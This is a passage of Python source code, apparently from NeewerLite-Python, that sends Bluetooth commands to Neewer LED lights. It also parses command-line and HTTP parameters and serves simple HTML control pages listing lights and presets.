splitCommands = calculateSeparateBytestrings(currentSendValue) # get both commands from the converter
# WRITE BOTH LUMINANCE AND HUE VALUES TOGETHER, BUT SEPARATELY
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[0]), False)
await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(splitCommands[1]), False)
else: # we're only writing either HUE or BRI independently
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(calculateSeparateBytestrings(currentSendValue)), False)
elif currentSendValue[1] == 129: # we're using an old light, but we're either turning the light on or off
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
elif currentSendValue[1] == 134: # we can't use HSI mode with this light, so show that
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "This light can not use HSI mode"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light (or tried to at least)
elif currentSendValue[1] == 136: # we can't use ANM/SCENE mode with this light, so show that
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "This light can not use ANM/SCENE mode"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light (or tried to at least)
else: # we're using a "newer" Neewer light, so just send the original calculated value
await availableLights[int(selectedLights[a])][1].write_gatt_char(setLightUUID, bytearray(currentSendValue), False)
if updateGUI == True:
# if we're not looking at an old light, or if we are, we're not in either HSI or ANM modes, then update the status of that light
if not (availableLights[(int(selectedLights[a]))][5] == True and (currentSendValue[1] == 134 or currentSendValue[1] == 136)):
if currentSendValue[1] != 129: # if we're not turning the light on or off
mainWindow.setTheTable(["", "", "", updateStatus(True, currentSendValue)], int(selectedLights[a]))
else: # we ARE turning the light on or off
if currentSendValue[3] == 1: # we turned the light on
availableLights[int(selectedLights[a])][6] = True # toggle the "light on" parameter of this light to ON
changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("STBY", "ON")
mainWindow.setTheTable(["", "", changeStatus, "Light turned on"], int(selectedLights[a]))
else: # we turned the light off
availableLights[int(selectedLights[a])][6] = False # toggle the "light on" parameter of this light to OFF
changeStatus = mainWindow.returnTableInfo(selectedLights[a], 2).replace("ON", "STBY")
mainWindow.setTheTable(["", "", changeStatus, "Light turned off\nA long period of inactivity may require a re-link to the light"], int(selectedLights[a]))
else:
returnValue = True # we successfully wrote to the light
if currentSendValue[1] != 129: # if we didn't just send a command to turn the light on/off
availableLights[selectedLights[a]][3] = currentSendValue # store the currenly sent value to recall later
except Exception as e:
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "Error Sending to light!"], int(selectedLights[a]))
else: # if there is no Bleak object associated with this light (otherwise, it's been found, but not linked)
if updateGUI == True:
mainWindow.setTheTable(["", "", "", "Light isn't linked yet, can't send to it"], int(selectedLights[a]))
else:
returnValue = 0 # the light is not linked, even though it *should* be if it gets to this point, so this is an odd error
if useGlobalValue == True:
startTimer = time.time() # if we sent a value, then reset the timer
else:
break # don't do the loop again (as we just want to send the commands once instead of look for newly selected lights)
await asyncio.sleep(0.05) # wait 1/20th of a second to give the Bluetooth bus a little time to recover
if updateGUI == True:
selectedLights = mainWindow.selectedLights() # re-acquire the current list of selected lights
except Exception as e:
printDebugString("There was an error communicating with the light.")
print(e)
if updateGUI == True:
returnValue = False # there was an error writing to this light, so return false to the CLI
if updateGUI == True:
if threadAction != "quit": # if we've been asked to quit somewhere else in the program
printDebugString("Leaving send mode and going back to background thread")
else:
printDebugString("The program has requested to quit, so we're not going back to the background thread")
returnValue = "quit"
return returnValue
# USE THIS FUNCTION TO CONNECT TO ONE LIGHT (for CLI mode) AND RETRIEVE ANY CUSTOM PREFS (necessary for lights like the SNL-660)
async def connectToOneLight(MACAddress):
global availableLights
try:
currentLightToAdd = await BleakScanner.find_device_by_address(MACAddress)
customLightPrefs = getCustomLightPrefs(currentLightToAdd.address, currentLightToAdd.name)
availableLights = [[currentLightToAdd, "", customLightPrefs[0], [], customLightPrefs[1], customLightPrefs[2], True]]
except Exception as e:
printDebugString("Error finding the Neewer light with MAC address " + MACAddress)
print(e)
# THE BACKGROUND WORKER THREAD
def workerThread(_loop):
global threadAction
# A LIST OF LIGHTS THAT DON'T SEND POWER/CHANNEL STATUS
lightsToNotCheckPower = ["NEEWER-RGB176"]
if findLightsOnStartup == True: # if we're set to find lights at startup, then automatically set the thread to discovery mode
threadAction = "discover"
delayTicks = 1 # count a few ticks before checking light information
while True:
if delayTicks < 12:
delayTicks += 1
elif delayTicks == 12:
delayTicks = 1
printDebugString("Background Thread Running")
# CHECK EACH LIGHT AGAINST THE TABLE TO SEE IF THERE ARE CONNECTION ISSUES
for a in range(len(availableLights)):
if threadAction == "": # if we're not sending, then update the light info... (check this before scanning each light)
if availableLights[a][1] != "": # if there is a Bleak object, then check to see if it's connected
if not availableLights[a][1].is_connected: # the light is disconnected, but we're reporting it isn't
mainWindow.setTheTable(["", "", "NOT\nLINKED", "Light disconnected!"], a) # show the new status in the table
availableLights[a][1] = "" # clear the Bleak object
else:
if not availableLights[a][0].name in lightsToNotCheckPower: # if the name of the current light is not in the list to skip checking
_loop.run_until_complete(getLightChannelandPower(a)) # then check the power and light status of that light
mainWindow.setTheTable(["", "", "LINKED\n" + availableLights[a][7][0] + " / ᴄʜ. " + str(availableLights[a][7][1]), ""], a)
else: # if the light we're scanning doesn't supply power or channel status, then just show "LINKED"
mainWindow.setTheTable(["", "", "LINKED", ""], a)
if threadAction == "quit":
printDebugString("Stopping the background thread")
threadAction = "finished"
break # stop the background thread before quitting the program
elif threadAction == "discover":
threadAction = _loop.run_until_complete(findDevices()) # add new lights to the main array
if threadAction != "quit":
mainWindow.updateLights() # tell the GUI to update its list of available lights
if autoConnectToLights == True: # if we're set to automatically link to the lights on startup, then do it here
#for a in range(len(availableLights)):
if threadAction != "quit": # if we're not supposed to quit, then try to connect to the light(s)
_loop.run_until_complete(parallelAction("connect", [-1])) # connect to each available light in parallel
threadAction = ""
elif threadAction == "connect":
selectedLights = mainWindow.selectedLights() # get the list of currently selected lights
if threadAction != "quit": # if we're not supposed to quit, then try to connect to the light(s)
_loop.run_until_complete(parallelAction("connect", selectedLights)) # connect to each *selected* light in parallel
threadAction = ""
elif threadAction == "send":
threadAction = _loop.run_until_complete(writeToLight()) # write a value to the light(s) - the selectedLights() section is in the write loop itself for responsiveness
elif threadAction != "":
threadAction = processMultipleSends(_loop, threadAction)
time.sleep(0.25)
def processMultipleSends(_loop, threadAction, updateGUI = True):
currentThreadAction = threadAction.split("|")
if currentThreadAction[0] == "send": # this will come from loading a custom snapshot preset
lightsToSendTo = [] # the current lights to affect
for a in range (1, len(currentThreadAction)): # find the lights that need to be refreshed
lightsToSendTo.append(int(currentThreadAction[a]))
threadAction = _loop.run_until_complete(writeToLight(lightsToSendTo, updateGUI, False)) # write the value stored in the lights to the light(s)
return threadAction
async def parallelAction(theAction, theLights, updateGUI = True):
# SUBMIT A SERIES OF PARALLEL ASYNCIO FUNCTIONS TO RUN ALL IN PARALLEL
parallelFuncs = []
if theLights[0] == -1: # if we have no specific lights set, then operate on the entire availableLights range
theLights = [] # clear the selected light list
for a in range(len(availableLights)):
theLights.append(a) # add all of availableLights to the list
for a in range(len(theLights)):
if theAction == "connect": # connect to a series of lights
parallelFuncs.append(connectToLight(theLights[a], updateGUI))
elif theAction == "disconnect": # disconnect from a series of lights
parallelFuncs.append(disconnectFromLight(theLights[a], updateGUI))
await asyncio.gather(*parallelFuncs) # run the functions in parallel
def processCommands(listToProcess=[]):
inStartupMode = False # if we're in startup mode (so report that to the log), start as False initially to be set to True below
# SET THE CURRENT LIST TO THE sys.argv SYSTEM PARAMETERS LIST IF A LIST ISN'T SPECIFIED
# SO WE CAN USE THIS SAME FUNCTION TO PARSE HTML ARGUMENTS USING THE HTTP SERVER AND COMMAND-LINE ARGUMENTS
if len(listToProcess) == 0: # if there aren't any elements in the list, then check against sys.argv
listToProcess = sys.argv[1:] # the list to parse is the system args minus the first one
inStartupMode = True
# ADD DASHES TO ANY PARAMETERS THAT DON'T CURRENTLY HAVE THEM AS WELL AS
# CONVERT ALL ARGUMENTS INTO lower case (to allow ALL CAPS arguments to parse correctly)
for a in range(len(listToProcess)):
if listToProcess[a] != "-h" and listToProcess[a][:2] != "--": # if the dashes aren't in the current item (and it's not the -h flag)
if listToProcess[a][:1] == "-": # if the current parameter only has one dash (typed wrongly)
listToProcess[a] = "--" + listToProcess[a][1:].lower() # then remove that, and add the double dash and switch to lowercase
else: # the parameter has no dashes at all, so add them
listToProcess[a] = "--" + listToProcess[a].lower() # add the dashes + switch to lowercase to properly parse as arguments below
else: # if the dashes are already in the current item
listToProcess[a] = listToProcess[a].lower() # we don't need to add dashes, so just switch to lowercase
# ARGUMENTS EACH MODE HAS ACCESS TO
acceptable_arguments = ["--light", "--mode", "--temp", "--hue", "--sat", "--bri", "--intensity",
"--scene", "--animation", "--list", "--on", "--off", "--force_instance"]
# MODE-SPECIFIC ARGUMENTS
if inStartupMode == True: # if we're using the GUI or CLI, then add these arguments to the list
acceptable_arguments.extend(["--http", "--cli", "--silent", "--help"])
else: # if we're using the HTTP server, then add these arguments to the list
acceptable_arguments.extend(["--discover", "--nopage", "--link", "--use_preset", "--save_preset"])
# KICK OUT ANY PARAMETERS THAT AREN'T IN THE "ACCEPTABLE ARGUMENTS" LIST
for a in range(len(listToProcess) - 1, -1, -1):
if not any(x in listToProcess[a] for x in acceptable_arguments): # if the current argument is invalid
if inStartupMode == True:
if listToProcess[a] != "-h": # and the argument isn't "-h" (for help)
listToProcess.pop(a) # delete the invalid argument from the list
else: # if we're not in startup mode, then also delete the "-h" flag
listToProcess.pop(a) # delete the invalid argument from the list
# IF THERE ARE NO VALID PARAMETERS LEFT TO PARSE, THEN RETURN THAT TO THE HTTP SERVER
if inStartupMode == False and len(listToProcess) == 0:
printDebugString("There are no usable parameters from the HTTP request!")
return []
# FORCE VALUES THAT NEED PARAMETERS TO HAVE ONE, AND VALUES THAT REQUIRE NO PARAMETERS TO HAVE NONE
for a in range(len(listToProcess)):
if listToProcess[a].find("--silent") != -1:
listToProcess[a] = "--silent"
elif listToProcess[a].find("--cli") != -1:
listToProcess[a] = "--cli"
elif listToProcess[a].find("--html") != -1:
listToProcess[a] = "--html"
elif listToProcess[a].find("--discover") != -1:
listToProcess[a] = "--discover"
elif listToProcess[a].find("--off") != -1:
listToProcess[a] = "--off"
elif listToProcess[a].find("--on") != -1:
listToProcess[a] = "--on"
elif listToProcess[a] == "--link":
listToProcess[a] = "--link=-1"
elif listToProcess[a] == "--use_preset":
listToProcess[a] = "--use_preset=-1"
elif listToProcess[a] == "--save_preset":
listToProcess[a] = "--save_preset=-1"
# PARSE THE ARGUMENT LIST FOR CUSTOM PARAMETERS
parser = argparse.ArgumentParser()
parser.add_argument("--list", action="store_true", help="Scan for nearby Neewer lights and list them on the CLI") # list the currently available lights
parser.add_argument("--http", action="store_true", help="Use an HTTP server to send commands to Neewer lights using a web browser")
parser.add_argument("--silent", action="store_false", help="Don't show any debug information in the console")
parser.add_argument("--cli", action="store_false", help="Don't show the GUI at all, just send command to one light and quit")
parser.add_argument("--force_instance", action="store_false", help="Force a new instance of NeewerLite-Python if another one is already running")
# HTML SERVER SPECIFIC PARAMETERS
if inStartupMode == False:
parser.add_argument("--discover", action="store_true") # tell the HTTP server to search for newly added lights
parser.add_argument("--link", default=-1) # link a specific light to NeewerLite-Python
parser.add_argument("--nopage", action="store_false") # don't render an HTML page
parser.add_argument("--use_preset", default=-1) # number of custom preset to use via the HTTP interface
parser.add_argument("--save_preset", default=-1) # option to save a custom snapshot preset via the HTTP interface
parser.add_argument("--on", action="store_true", help="Turn the light on")
parser.add_argument("--off", action="store_true", help="Turn the light off")
parser.add_argument("--light", default="", help="The MAC Address (XX:XX:XX:XX:XX:XX) of the light you want to send a command to or ALL to find and control all lights (only valid when also using --cli switch)")
parser.add_argument("--mode", default="CCT", help="[DEFAULT: CCT] The current control mode - options are HSI, CCT and either ANM or SCENE")
parser.add_argument("--temp", "--temperature", default="56", help="[DEFAULT: 56(00)K] (CCT mode) - the color temperature (3200K+) to set the light to")
parser.add_argument("--hue", default="240", help="[DEFAULT: 240] (HSI mode) - the hue (0-360 degrees) to set the light to")
parser.add_argument("--sat", "--saturation", default="100", help="[DEFAULT: 100] (HSI mode) The saturation (how vibrant the color is) to set the light to")
parser.add_argument("--bri", "--brightness", "--intensity", default="100", help="[DEFAULT: 100] (CCT/HSI/ANM mode) The brightness (intensity) to set the light to")
parser.add_argument("--scene", "--animation", default="1", help="[DEFAULT: 1] (ANM or SCENE mode) The animation (1-9) to use in Scene mode")
args = parser.parse_args(listToProcess)
if args.force_instance == False: # if this value is True, then don't do anything
global anotherInstance
anotherInstance = False # change the global to False to allow new instances
if args.silent == True:
if inStartupMode == True:
if args.list != True: # if we're not looking for lights using --list, then print line
printDebugString("Starting program with command-line arguments")
else:
printDebugString("Processing HTTP arguments")
args.cli = False # we're running the CLI, so don't initialize the GUI
args.silent = printDebug # we're not changing the silent flag, pass on the current printDebug setting
if args.http == True:
return ["HTTP", args.silent] # special mode - don't do any other mode/color/etc. processing, just jump into running the HTML server
if inStartupMode == False:
# HTTP specific parameter returns!
if args.discover == True:
return[None, args.nopage, None, "discover"] # discover new lights
if args.link != -1:
return[None, args.nopage, args.link, "link"] # return the value defined by the parameter
if args.list == True:
return [None, args.nopage, None, "list"]
if args.use_preset != -1:
return[None, args.nopage, testValid("use_preset", int(args.use_preset), 1, 1, 8), "use_preset"]
else:
# If we request "LIST" from the CLI, then return a CLI list of lights available
if args.list == True:
return["LIST", False]
# CHECK TO SEE IF THE LIGHT SHOULD BE TURNED OFF
if args.on == True: # we want to turn the light on
return [args.cli, args.silent, args.light, "ON"]
elif args.off == True: # we want to turn the light off
return [args.cli, args.silent, args.light, "OFF"]
# IF THE LIGHT ISN'T BEING TURNED OFF, CHECK TO SEE IF MODES ARE BEING SET
if args.mode.lower() == "hsi":
return [args.cli, args.silent, args.light, "HSI",
testValid("hue", args.hue, 240, 0, 360),
testValid("sat", args.sat, 100, 0, 100),
testValid("bri", args.bri, 100, 0, 100)]
elif args.mode.lower() in ("anm", "scene"):
return [args.cli, args.silent, args.light, "ANM",
testValid("scene", args.scene, 1, 1, 9),
testValid("bri", args.bri, 100, 0, 100)]
else: # we've either asked for CCT mode, or gave an invalid mode name
if args.mode.lower() != "cct": # if we're not actually asking for CCT mode, display error message
printDebugString(" >> Improper mode selected with --mode command - valid entries are")
printDebugString(" >> CCT, HSI or either ANM or SCENE, so rolling back to CCT mode.")
# RETURN CCT MODE PARAMETERS IN CCT/ALL OTHER CASES
return [args.cli, args.silent, args.light, "CCT",
testValid("temp", args.temp, 56, 32, 85),
testValid("bri", args.bri, 100, 0, 100)]
def processHTMLCommands(paramsList, loop):
global threadAction
if threadAction == "": # if we're not already processing info in another thread
threadAction = "HTTP"
if len(paramsList) != 0:
if paramsList[3] == "discover": # we asked to discover new lights
loop.run_until_complete(findDevices()) # find the lights available to control
# try to connect to each light
if autoConnectToLights == True:
loop.run_until_complete(parallelAction("connect", [-1], False)) # try to connect to *all* lights in parallel
elif paramsList[3] == "link": # we asked to connect to a specific light
selectedLights = returnLightIndexesFromMacAddress(paramsList[2])
if len(selectedLights) > 0:
loop.run_until_complete(parallelAction("connect", selectedLights, False)) # try to connect to all *selected* lights in parallel
elif paramsList[3] == "use_preset":
recallCustomPreset(paramsList[2] - 1, False, loop)
elif paramsList[3] == "save_preset":
pass
else: # we want to write a value to a specific light
if paramsList[3] == "CCT": # calculate CCT bytestring
calculateByteString(colorMode=paramsList[3], temp=paramsList[4], brightness=paramsList[5])
elif paramsList[3] == "HSI": # calculate HSI bytestring
calculateByteString(colorMode=paramsList[3], HSI_H=paramsList[4], HSI_S=paramsList[5], HSI_I=paramsList[6])
elif paramsList[3] == "ANM": # calculate ANM/SCENE bytestring
calculateByteString(colorMode=paramsList[3], animation=paramsList[4], brightness=paramsList[5])
elif paramsList[3] == "ON": # turn the light(s) on
setPowerBytestring("ON")
elif paramsList[3] == "OFF": # turn the light(s) off
setPowerBytestring("OFF")
selectedLights = returnLightIndexesFromMacAddress(paramsList[2])
if len(selectedLights) > 0:
loop.run_until_complete(writeToLight(selectedLights, False))
threadAction = "" # clear the thread variable
else:
printDebugString("The HTTP Server requested an action, but we're already working on one. Please wait...")
def returnLightIndexesFromMacAddress(addresses):
foundIndexes = [] # the list of indexes for the lights you specified
if addresses == "*": # if we ask for every light available, then return that
for a in range(len(availableLights)):
foundIndexes.append(a)
else: # break down what we're asking for into indexes
addressesToCheck = addresses.split(";")
for a in range(len(addressesToCheck)):
try: # if the specified light is just an index, then return the light you asked for
currentLight = int(addressesToCheck[a]) - 1 # check to see if the current light can be converted to an integer
# if the above succeeds, make sure that the index returned is a valid light index
if currentLight < 0 or currentLight > len(availableLights):
currentLight = -1 # if the index is less than 0, or higher than the last available light, then... nada
except ValueError: # we're most likely asking for a MAC address instead of an integer index
currentLight = -1
for b in range(len(availableLights)):
if addressesToCheck[a].upper() == availableLights[b][0].address.upper(): # if the MAC address specified matches the current light
currentLight = b
break
if currentLight != -1: # the found light index is valid
foundIndexes.append(currentLight) # add the found index to the list of indexes
return foundIndexes
class NLPythonServer(BaseHTTPRequestHandler):
loop = asyncio.get_event_loop()
def _send_cors_headers(self):
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Access-Control-Allow-Methods", "GET, OPTIONS")
def do_OPTIONS(self):
self.send_response(200)
self._send_cors_headers()
self.end_headers()
def do_GET(self):
if self.path == "/favicon.ico": # if favicon.ico is specified, then send a 404 error and stop processing
try:
self.send_error(404)
except ConnectionAbortedError:
printDebugString("Could not serve the error page, the HTTP server is already busy with another request.")
return
else:
# CHECK THE LENGTH OF THE URL REQUEST AND SEE IF IT'S TOO LONG
if len(self.path) > 159: # INCREASED LENGTH DUE TO ADDITION OF doAction IN THE URL
# THE LAST REQUEST WAS WAY TOO LONG, SO QUICKLY RENDER AN ERROR PAGE AND RETURN FROM THE HTTP RENDERER
writeHTMLSections(self, "httpheaders")
writeHTMLSections(self, "htmlheaders")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "errorHelp", "The last request you provided was too long! The NeewerLite-Python HTTP server can only accept URL commands less than 132 characters long after /NeewerLite-Python/doAction?")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "htmlendheaders")
return
# CHECK TO SEE IF THE IP REQUESTING ACCESS IS IN THE LIST OF "acceptable_HTTP_IPs"
clientIP = self.client_address[0] # the IP address of the machine making the request
acceptedIP = False
for check in range(len(acceptable_HTTP_IPs)): # check all the "accepted" IP addresses against the current requesting IP
if acceptedIP != True: # if we haven't found the IP in the accepted list, then keep checking
if acceptable_HTTP_IPs[check] in clientIP:
acceptedIP = True # if we're good to go, then we can just move on
# IF THE IP MAKING THE REQUEST IS NOT IN THE LIST OF APPROVED ADDRESSES, THEN RETURN A "FORBIDDEN" ERROR
if acceptedIP == False:
self.send_error(403, "The IP of the device you're making the request from (" + clientIP + ") has to be in the list of accepted IP addresses in order to use the NeewerLite-Python HTTP Server, any outside addresses will generate this Forbidden error. To use this device with NeewerLite-Python, add its IP address (or range of IP addresses) to the list of acceptable IPs")
return
acceptableURL = "/NeewerLite-Python/doAction?"
if not acceptableURL in self.path: # if we ask for something that's not the main directory, then redirect to the main error page
self.send_response(302)
self.send_header('Location', acceptableURL)
self.end_headers()
return
else: # if the URL contains "/NeewerLite-Python/doAction?" then it's a valid URL
writeHTMLSections(self, "httpheaders")
# BREAK THE URL INTO USABLE PARAMTERS
paramsList = self.path.replace(acceptableURL, "").split("&") # split the included params into a list
paramsList = processCommands(paramsList) # process the commands returned from the HTTP parameters
if len(paramsList) == 0: # we have no valid parameters, so show the error page
writeHTMLSections(self, "htmlheaders")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "errorHelp", "You didn't provide any valid parameters in the last URL. To send multiple parameters to NeewerLite-Python, separate each one with a & character.")
writeHTMLSections(self, "quicklinks")
writeHTMLSections(self, "htmlendheaders")
return
else:
if paramsList[1] == True:
writeHTMLSections(self, "htmlheaders") # write the HTML header section
writeHTMLSections(self, "quicklinks")
self.wfile.write(bytes("<H1>Request Successful!</H1>\n", "utf-8"))
self.wfile.write(bytes("Last Request: <EM>" + self.path + "</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("From IP: <EM>" + clientIP + "</EM><BR><BR>\n", "utf-8"))
if paramsList[3] != "list":
if paramsList[1] == True:
self.wfile.write(bytes("Provided Parameters:<BR>\n", "utf-8"))
if len(paramsList) <= 2:
for a in range(len(paramsList)):
self.wfile.write(bytes(" " + str(paramsList[a]) + "<BR>\n", "utf-8"))
else:
if paramsList[3] == "use_preset":
self.wfile.write(bytes(" Preset to Use: " + str(paramsList[2]) + "<BR>\n", "utf-8"))
elif paramsList[3] == "save_preset":
pass # TODO: implement saving presets!
else:
self.wfile.write(bytes(" Light(s) to connect to: " + str(paramsList[2]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Mode: " + str(paramsList[3]) + "<BR>\n", "utf-8"))
if paramsList[3] == "CCT":
self.wfile.write(bytes(" Color Temperature: " + str(paramsList[4]) + "00K<BR>\n", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[5]) + "<BR>\n", "utf-8"))
elif paramsList[3] == "HSI":
self.wfile.write(bytes(" Hue: " + str(paramsList[4]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Saturation: " + str(paramsList[5]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[6]) + "<BR>\n", "utf-8"))
elif paramsList[3] == "ANM" or paramsList[3] == "SCENE":
self.wfile.write(bytes(" Animation Scene: " + str(paramsList[4]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes(" Brightness: " + str(paramsList[5]) + "<BR>\n", "utf-8"))
self.wfile.write(bytes("<BR><HR><BR>\n", "utf-8"))
# PROCESS THE HTML COMMANDS IN ANOTHER THREAD
htmlProcessThread = threading.Thread(target=processHTMLCommands, args=(paramsList, loop), name="htmlProcessThread")
htmlProcessThread.start()
if paramsList[1] == True: # if we've been asked to list the currently available lights, do that now
totalLights = len(availableLights)
if totalLights == 0: # there are no lights available to you at the moment!
self.wfile.write(bytes("NeewerLite-Python is not currently set up with any Neewer lights. To discover new lights, <A HREF='doAction?discover'>click here</a>.<BR>\n", "utf-8"))
else:
self.wfile.write(bytes("List of available Neewer lights:<BR><BR>\n", "utf-8"))
self.wfile.write(bytes("<TABLE WIDTH='98%' BORDER='1'>\n", "utf-8"))
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:2%; text-align:left'>ID #\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:18%; text-align:left'>Custom Name</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:18%; text-align:left'>Light Type</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:30%; text-align:left'>MAC Address/GUID</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:5%; text-align:left'>RSSI</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:5%; text-align:left'>Linked</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:22%; text-align:left'>Last Sent Value</TH>\n", "utf-8"))
self.wfile.write(bytes(" </TR>\n", "utf-8"))
for a in range(totalLights):
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(173,255,47)'>" + str(a + 1) + "</TD>\n", "utf-8")) # light ID #
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + availableLights[a][2] + "</TD>\n", "utf-8")) # light custom name
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + availableLights[a][0].name + "</TD>\n", "utf-8")) # light type
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + availableLights[a][0].address + "</TD>\n", "utf-8")) # light MAC address
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + str(availableLights[a][0].rssi) + " dbM</TD>\n", "utf-8")) # light RSSI (signal quality)
try:
if availableLights[a][1].is_connected:
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + "Yes" + "</TD>\n", "utf-8")) # is the light linked?
else:
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + "<A HREF='doAction?link=" + str(a + 1) + "'>No</A></TD>\n", "utf-8")) # is the light linked?
except Exception as e:
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + "<A HREF='doAction?link=" + str(a + 1) + "'>No</A></TD>\n", "utf-8")) # is the light linked?
self.wfile.write(bytes(" <TD STYLE='background-color:rgb(240,248,255)'>" + updateStatus(False, availableLights[a][3]) + "</TD>\n", "utf-8")) # the last sent value to the light
self.wfile.write(bytes(" </TR>\n", "utf-8"))
self.wfile.write(bytes("</TABLE>\n", "utf-8"))
self.wfile.write(bytes("<BR><HR><BR>\n", "utf-8"))
self.wfile.write(bytes("<A ID='presets'>List of available custom presets to use:</A><BR><BR>\n", "utf-8"))
self.wfile.write(bytes("<TABLE WIDTH='98%' BORDER='1'>\n", "utf-8"))
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:4%; text-align:left'>Preset\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:46%; text-align:left'>Preset Parameters</TH>\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:4%; text-align:left'>Preset\n", "utf-8"))
self.wfile.write(bytes(" <TH STYLE='width:46%; text-align:left'>Preset Parameters</TH>\n", "utf-8"))
self.wfile.write(bytes(" </TR>\n", "utf-8"))
for a in range(4): # build the list itself, showing 2 presets next to each other
currentPreset = (2 * a)
self.wfile.write(bytes(" <TR>\n", "utf-8"))
self.wfile.write(bytes(" <TD ALIGN='CENTER' STYLE='background-color:rgb(173,255,47)'><FONT SIZE='+2'><A HREF='doAction?use_preset=" + str(currentPreset + 1) + "#presets'>" + str(currentPreset + 1) + "</A></FONT></TD>\n", "utf-8"))
self.wfile.write(bytes(" <TD VALIGN='TOP' STYLE='background-color:rgb(240,248,255)'>" + customPresetInfoBuilder(currentPreset, True) + "</TD>\n", "utf-8"))
self.wfile.write(bytes(" <TD ALIGN='CENTER' STYLE='background-color:rgb(173,255,47)'><FONT SIZE='+2'><A HREF='doAction?use_preset=" + str(currentPreset + 2) + "#presets'>" + str(currentPreset + 2) + "</A></FONT></TD>\n", "utf-8"))
self.wfile.write(bytes(" <TD VALIGN='TOP' STYLE='background-color:rgb(240,248,255)'>" + customPresetInfoBuilder(currentPreset + 1, True) + "</TD>\n", "utf-8"))
self.wfile.write(bytes(" </TR>\n", "utf-8"))
self.wfile.write(bytes("</TABLE>\n", "utf-8"))
if paramsList[1] == True:
writeHTMLSections(self, "quicklinks") # add the footer to the bottom of the page
writeHTMLSections(self, "htmlendheaders") # add the ending section to the very bottom
def writeHTMLSections(self, theSection, errorMsg = ""):
if theSection == "httpheaders":
self.send_response(200)
self._send_cors_headers()
self.send_header("Content-type", "text/html")
self.end_headers()
elif theSection == "htmlheaders":
self.wfile.write(bytes("<!DOCTYPE html>\n", "utf-8"))
self.wfile.write(bytes("<HTML>\n<HEAD>\n", "utf-8"))
self.wfile.write(bytes("<TITLE>NeewerLite-Python 0.11 HTTP Server by Zach Glenwright</TITLE>\n</HEAD>\n", "utf-8"))
self.wfile.write(bytes("<BODY>\n", "utf-8"))
elif theSection == "errorHelp":
self.wfile.write(bytes("<H1>Invalid request!</H1>\n", "utf-8"))
self.wfile.write(bytes("Last Request: <EM>" + self.path + "</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(errorMsg + "<BR><BR>\n", "utf-8"))
self.wfile.write(bytes("Valid parameters to use -<BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>list</STRONG> - list the current lights NeewerLite-Python has available to it and the custom presets it can use<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?list</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>discover</STRONG> - tell NeewerLite-Python to scan for new lights<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?discover</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>nopage</STRONG> - send a command to the HTTP server, but don't render the webpage showing the results (<EM>useful, for example, on a headless Raspberry Pi where you don't necessarily want to see the results page</EM>)<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?nopage</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>link=</STRONG> - (value: <EM>index of light to link to</EM>) manually link to a specific light - you can specify multiple lights with semicolons (so link=1;2 would try to link to both lights 1 and 2)<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?link=1</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>light=</STRONG> - the MAC address (or current index of the light) you want to send a command to - you can specify multiple lights with semicolons (so light=1;2 would send a command to both lights 1 and 2)<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66</EM><BR>\n", "utf-8"))
